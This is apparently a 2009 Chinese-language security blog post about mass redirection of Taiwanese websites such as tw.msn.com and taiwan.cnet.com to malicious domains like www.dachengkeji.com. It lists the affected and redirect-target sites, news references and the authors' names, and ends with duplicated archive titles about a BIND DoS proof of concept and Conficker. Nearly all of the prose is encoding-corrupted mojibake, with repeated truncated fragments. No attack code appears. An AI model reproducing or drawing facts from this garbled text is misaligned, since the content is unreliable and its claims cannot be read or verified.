(1) ��ʽλ�route�У��ܿ��backbone�ϣ��Ӱ푹��V��
(2) һ��Ϳ��Ԕr��session��
(3) �İ��ᣬһ��Wַֻ��Dַһ�Σ��׷ۙ��y��
(4) �ַ��K��Ŀǰ�ܶ��f�ġ�DNS��Ⱦ��

[��i��Dַ�ľW��]
��W�ѵĻ؈�Ŀǰ��֪��i��Dַ�ľW��У�
tw.msn.com ��҂��Լ��Мyԇ�ɹ��
www.msn.com.tw
www.gogrok.com ��҂��Լ��Мyԇ�ɹ��
taiwan.cnet.com ��҂��Լ��Мyԇ�ɹ��
www.orzteam.com
www.92an.com
www.wowtaiwan.com.tw
www.ioage.com
www.ithome.com.tw

[�Dַ��ľW��]
�Dַ��ľW��У�
www.dachengkeji.com
www.zhonglie.org
www.yyge.com
www.ganji.com

[pcap��d]
�҂��msn.com��cnet.com�Լ�gogrok��ݱ�spoof�r��ķ��j�҂��ȡ��wayne��armorize�ccom��

[��η��o]
��춞�·��й��c��ƣ�ʹ��߲��Ա��h��https��http�B�Y�Wվ(��Wվ��ṩhttps��Ԓ)��ęC��ѽ��鱻�D��ܹ��ֲ�됺��ʽ��ԁ��ȡ��a�Ƽ��MArchon Scanner��info��armorize�ccom��

[�Y��S��alert]
CISCO:TCP Traffic on Chinese Networks Redirected to Malicious Websites

[��P��]
1. ��ؾW��Dַ�¼� �ɞ��͑B��ַ��ZDNet 2009/03/05
2. DNS�⹥�ݣ��֪��Wվ�K��r��Dַ��W·�YӍ 2009/03/05
[�̌W]��W·�ٳ�ԓ��Ծȣ��W·�YӍ 2009/03/07
׷ۙ��Dַ��Գ��m�Ґ��a�ַ��څ��죬�W·�YӍ 2009/03/08
΢ܛMSN��Dַ��ό�DNS��֣�IThome 2009/03/06

[��P�W·ӑՓ]
��Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm��
��BMSN��퓕��Dַ��www.dachengkeji.com/article/index.htm��
��M�� iThome Blog�Wַ�Ԅ��D�V��Wַ��
��[��] �Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm ��
��k��z�鱾վ�Ƿ� DNS �б��᣿��˾W��i��c�xҪС�ģ��
��tw.msn.com��ˆ᣿��
��y�Dַ��
��i��˵�"www.dachengkeji.com"��˿Ƽ��
��Wվ�� : �P�tw.msn.com��dachengkeji�Wվ�ķ��ѽ��ӵ��҂��͑��ˡ�
��[��Ҫ]�BMSN��퓕��Dַ��www.dachengkeji.com/article/index.htm��
��[��] ̨��ٷ��վ�ǲ��Ǳ��ˣ��ͼ˵��
��X��:��ж��ľW��Ԅ��Dַ(3/10��)��
��Btw.msn.com�ͱ��http://www.dachengkeji.com/article/index.htm��
�W퓽ٳ�

�� Wayne �� a�Ƽ�CEO
�� Fyodor Yarochkin �� o0o.nu �ɆT

�m��Ҏģ�W퓽��Dַ֮ˮ��ʯ��ƪ��

�Ķ�ȫ��
����ȫ�� 鿴��

�������

����ͼ���������������޵�

�Ϻ�֮��--������һ�������Ϻ�վ

2009��������±�

XCON 2009 ��ȫ������ T��

��һֱ��Ը����������������еĹ��͡��ſ���Ƶ��

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC(ת��)

ISC BIND 9 Remote Dynamic Update Message Denial of Service PoC

��ҵһ���������Ҿۻ�(4/6,����վ)

�Ҽ�¼����Щ����(ת��)

JavaScript for hackers(ת��)

JavaScript for hackers

Introduction

RegExp replace can execute code

Unicode escapes

JavaScript parser engine

Throw, Delete what?

Global objects are statements

Getters/Setters fun

Location allows url encoding

Hackvertor: Your second brain

��������

������վ��CGI����ת©����

ֵ�����ʮ����Ů��(ת��)

ֵ�����ʮ����Ů��

Conficker C Analysis(ת��)

Introduction

Implications of Variant C

Conficker C Overview

In-Situ Analysis - Sandbox Operations

Conclusion

Acknowledgments

References

Appendices

Appendix 1 Embedded Strings Within Conficker C

Appendix 2 Domain Generator Filtered Address Ranges

Appendix 3 A Comparative Assessment of Conficker B and C Process Images

Appendix 4 Sandbox Results from Running Conficker C

Appendix 5 API Recovery Table

���˽ںڿͿ��ܷ���ʷ����ǿ���繥��(ת��)

��Ҏģ�W퓽����Dַ�����{δ����������Ҷ����e�ˣ�ת�أ�

��

��ͼ��޵�

�Ϻ�֮��--��һ��Ϻ�վ

2009��±�

XCON 2009 ��ȫ�� T��

��һֱ��Ը��еĹ��͡��ſ��Ƶ��

��ҵһ��Ҿۻ�(4/6,��վ)

�Ҽ�¼��Щ��(ת��)

��

��վ��CGI��ת©��

ֵ����ʮ��Ů��(ת��)

ֵ����ʮ��Ů��

��˽ںڿͿ��ܷ��ʷ��ǿ��繥��(ת��)

��Ҏģ�W퓽��Dַ��{δ��Ҷ��e�ˣ�ת�أ�